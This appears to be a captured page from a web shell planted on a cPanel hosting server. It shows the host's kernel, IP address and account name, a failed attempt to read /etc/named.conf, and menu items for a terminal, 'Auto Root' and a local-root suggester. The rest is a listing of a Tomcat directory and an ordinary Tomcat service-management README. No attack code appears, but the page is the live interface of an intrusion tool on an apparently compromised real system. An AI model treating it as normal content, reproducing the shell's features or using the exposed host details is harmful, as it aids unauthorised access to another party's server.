Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.144
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-tomcat85 /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2024-01-16 19:30
conf
[ DIR ]
drwxr-xr-x
2023-12-21 14:02
lib
[ DIR ]
drwxr-xr-x
2024-01-16 19:30
run
[ DIR ]
drwxr-xr-x
2025-09-07 15:06
temp
[ DIR ]
drwxr-xr-x
2024-01-16 19:30
user-conf
[ DIR ]
drwxr-xr-x
2024-01-16 19:30
webapps
[ DIR ]
drwxr-xr-x
2023-12-21 14:02
work
[ DIR ]
drwxr-xr-x
2023-12-21 14:02
BUILDING.txt
19.52
KB
-rw-r--r--
2023-12-21 14:02
CONTRIBUTING.md
6.06
KB
-rw-r--r--
2023-12-21 14:02
LICENSE
55.67
KB
-rw-r--r--
2023-12-21 14:02
NOTICE
1.69
KB
-rw-r--r--
2023-12-21 14:02
README.APACHE-PROXY
127
B
-rw-r--r--
2023-12-21 14:02
README.FASTERSTARTUP
117
B
-rw-r--r--
2023-12-21 14:02
README.SECURITY
132
B
-rw-r--r--
2023-12-21 14:02
README.SHARED-SERVICE-MANAGEMENT
1.49
KB
-rw-r--r--
2023-12-21 14:02
README.USER-INSTANCE
209
B
-rw-r--r--
2023-12-21 14:02
README.USER-SERVICE-MANAGEMENT
548
B
-rw-r--r--
2023-12-21 14:02
README.md
3.32
KB
-rw-r--r--
2023-12-21 14:02
RELEASE-NOTES
6.97
KB
-rw-r--r--
2023-12-21 14:02
RUNNING.txt
16.12
KB
-rw-r--r--
2023-12-21 14:02
sample.ea-tomcat85.initd
3.17
KB
-rw-r--r--
2023-12-21 14:02
sample.ea-tomcat85.logrotate
199
B
-rw-r--r--
2023-12-21 14:02
sample.ea-tomcat85.service
564
B
-rw-r--r--
2023-12-21 14:02
test.jsp
2.12
KB
-rw-r--r--
2023-12-21 14:02
Save
Rename
If you want to run an instance of tomcat as the tomcat users based out of /opt/cpanel/ea-tomcat85/ (as opposed to a private instance running as the user based out of ~/ea-tomcat85) you are free to do so at your own risk. For security (and other) reasons, the only method we recommend and support is the private instance method. (If you want ea3’s proxying bahavior you can achieve that w/ a private instance by using ~/ea-tomcat85/conf/server.xml proxy via Apache’s mod_proxy_ajp. Note: the tomcat user can’t see a user’s homedir so this can’t be used to mimic ea3’s shared tomcat without making your server extremely insecure.) If you still want to proceed these are the basic steps you’ll need to follow (depending on your needs they may be different). 1. Make sure you understand tomcat 8.5 very well Further Reading: https://tomcat.apache.org/tomcat-8.5-doc/ 2. Setup Log Rotation Install /opt/cpanel/ea-tomcat85/sample.ea-tomcat85.logrotate to the appropriate place for your server (e.g. /etc/logrotate.d/ea-tomcat85) 3. Setup Service Monitoring Install the appropriate service/init file for your system. E.g. For C7, /opt/cpanel/ea-tomcat85/sample.ea-tomcat85.service would go to /etc/systemd/system/ea_tomcat85.service For C6, /opt/cpanel/ea-tomcat85/sample.ea-tomcat85.initd would go to /etc/init.d/ea_tomcat85 4. Secure Your Configuration Further Reading: README.SECURITY 5. Fine Tune It Further Reading: README.FASTERSTARTUP, README.APACHE-PROXY